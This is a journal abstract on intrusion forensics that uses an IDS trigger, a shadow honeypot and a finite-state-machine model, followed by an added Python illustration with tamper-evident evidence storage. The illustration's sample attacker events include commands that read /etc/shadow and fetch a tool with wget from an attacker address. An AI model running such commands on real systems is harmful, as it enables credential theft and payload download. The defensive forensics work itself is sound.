计算机科学 (Computer Science)
2009, No. 11, pp. 65-67, 156 (4 pages)
Keywords: Dynamic forensics; Shadow honeypot; Self-adaptive; Finite state machine
Abstract: With the development of network intrusion techniques and computer crime, dynamic forensics is becoming increasingly important. Methods that use an intrusion detection system and honeypots for intrusion forensics have a great advantage in real-time performance, but they give little consideration to the reliability of the evidence, or of the system itself, while the system is under attack, and the right moment to start collecting evidence is hard to determine. This paper proposes a self-adaptive dynamic forensics mechanism in which the intrusion detection system acts as the forensics trigger and a shadow honeypot confirms the suspected attack and observes and analyzes it further, so that the forensics process adapts itself and collects the key evidence. The mechanism is then modeled as a finite state machine, and its key techniques, including the timing of state transitions, the shadow honeypot, and secure evidence storage, are described. Dynamic forensics built on this mechanism keeps the investigation process under control, reduces the amount of unnecessary evidence, and lets the system tolerate intrusion to a certain degree.
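The mechanism the abstract describes (an IDS alert as trigger, a shadow honeypot that confirms the suspected attack, adaptive collection of only the evidence that follows confirmation, and integrity-protected evidence storage), as an added worked example in Python. It is not the paper's own model or code: the state names, the transition table, the stand-in shadow-honeypot verdict, the HMAC key and the sample event stream are all assumptions constructed for this illustration.

```python
"""Self-adaptive dynamic forensics as a finite state machine.

Added illustration; not the paper's model or code.  The state names, the
transition table, the stand-in shadow-honeypot verdict, the HMAC key and
the sample event stream are all assumptions made for this example.
"""
import hashlib
import hmac
import json
from dataclasses import dataclass, field
from enum import Enum, auto


class State(Enum):
    MONITOR = auto()    # normal service; only the IDS is watching
    SUSPECT = auto()    # IDS alert raised; request replayed on the shadow honeypot
    CONFIRMED = auto()  # shadow honeypot saw real attack behaviour; collecting evidence
    CLOSED = auto()     # attacker session over; evidence chain sealed


# (current state, event) -> next state.  Unlisted pairs cause no transition,
# so nothing is ever recorded from MONITOR and a false positive costs no evidence.
TRANSITIONS = {
    (State.MONITOR, "ids_alert"): State.SUSPECT,
    (State.SUSPECT, "honeypot_attack"): State.CONFIRMED,
    (State.SUSPECT, "honeypot_benign"): State.MONITOR,
    (State.CONFIRMED, "activity"): State.CONFIRMED,
    (State.CONFIRMED, "session_end"): State.CLOSED,
}

ATTACK_EFFECTS = {"crash", "shell", "file_write"}


def shadow_honeypot_verdict(request: dict) -> str:
    """Stand-in for the shadow honeypot.  A real one re-executes the request in
    an instrumented copy of the service; here the copy's observed side effects
    are supplied in the constructed request under 'shadow_effects'."""
    effects = set(request.get("shadow_effects", []))
    return "honeypot_attack" if effects & ATTACK_EFFECTS else "honeypot_benign"


@dataclass
class EvidenceStore:
    """Append-only log whose entries are HMAC-chained, so editing, deleting or
    reordering an inner record breaks verification (secure evidence storage)."""
    key: bytes
    records: list = field(default_factory=list)
    prev_mac: str = "0" * 64

    def append(self, record: dict) -> None:
        body = json.dumps(record, sort_keys=True)
        mac = hmac.new(self.key, (self.prev_mac + body).encode(), hashlib.sha256).hexdigest()
        self.records.append({"body": body, "mac": mac})
        self.prev_mac = mac

    def verify(self) -> bool:
        prev = "0" * 64
        for rec in self.records:
            expected = hmac.new(self.key, (prev + rec["body"]).encode(), hashlib.sha256).hexdigest()
            if not hmac.compare_digest(expected, rec["mac"]):
                return False
            prev = rec["mac"]
        return True


class ForensicsFSM:
    """Drives the forensics process; evidence is written only once CONFIRMED."""

    def __init__(self, hmac_key: bytes):
        self.state = State.MONITOR
        self.store = EvidenceStore(hmac_key)
        self.ignored = 0  # events that caused no transition and left no evidence

    def handle(self, event: str, payload: dict) -> State:
        nxt = TRANSITIONS.get((self.state, event))
        if nxt is None:
            self.ignored += 1
            return self.state
        prev, self.state = self.state, nxt
        if self.state is State.CONFIRMED:
            # adaptive step: after confirmation every attacker action is evidence
            self.store.append({"event": event, "from": prev.name, "payload": payload})
        elif self.state is State.CLOSED:
            self.store.append({"event": "seal", "records": len(self.store.records)})
        if event == "ids_alert":
            # the alert itself is not evidence: let the shadow honeypot decide
            return self.handle(shadow_honeypot_verdict(payload), payload)
        return self.state


def run_session(events, hmac_key: bytes = b"constructed-demo-key") -> ForensicsFSM:
    fsm = ForensicsFSM(hmac_key)
    for event, payload in events:
        fsm.handle(event, payload)
    return fsm


# Constructed event stream: normal traffic, one IDS false positive, then a
# confirmed attack with two follow-up actions and the end of the session.
SAMPLE_EVENTS = [
    ("activity", {"src": "192.0.2.10", "req": "GET /index.html"}),
    ("ids_alert", {"src": "203.0.113.5", "sig": "SQLi pattern", "shadow_effects": []}),
    ("ids_alert", {"src": "198.51.100.7", "sig": "stack overflow", "shadow_effects": ["crash", "shell"]}),
    ("activity", {"src": "198.51.100.7", "cmd": "cat /etc/shadow"}),
    ("activity", {"src": "198.51.100.7", "cmd": "wget http://198.51.100.7/tool"}),
    ("session_end", {"src": "198.51.100.7"}),
]

if __name__ == "__main__":
    fsm = run_session(SAMPLE_EVENTS)
    print(fsm.state.name, len(fsm.store.records), "records, chain ok:", fsm.store.verify())
```

The false-positive alert leaves the machine back in MONITOR with no records written, which is where the reduction in unnecessary evidence comes from; the benign `activity` seen in MONITOR is simply ignored. The HMAC chain detects any change to a stored record, but not removal of the tail, so a verifier should also require that the final record be the `seal` entry and that its count match the number of records before it.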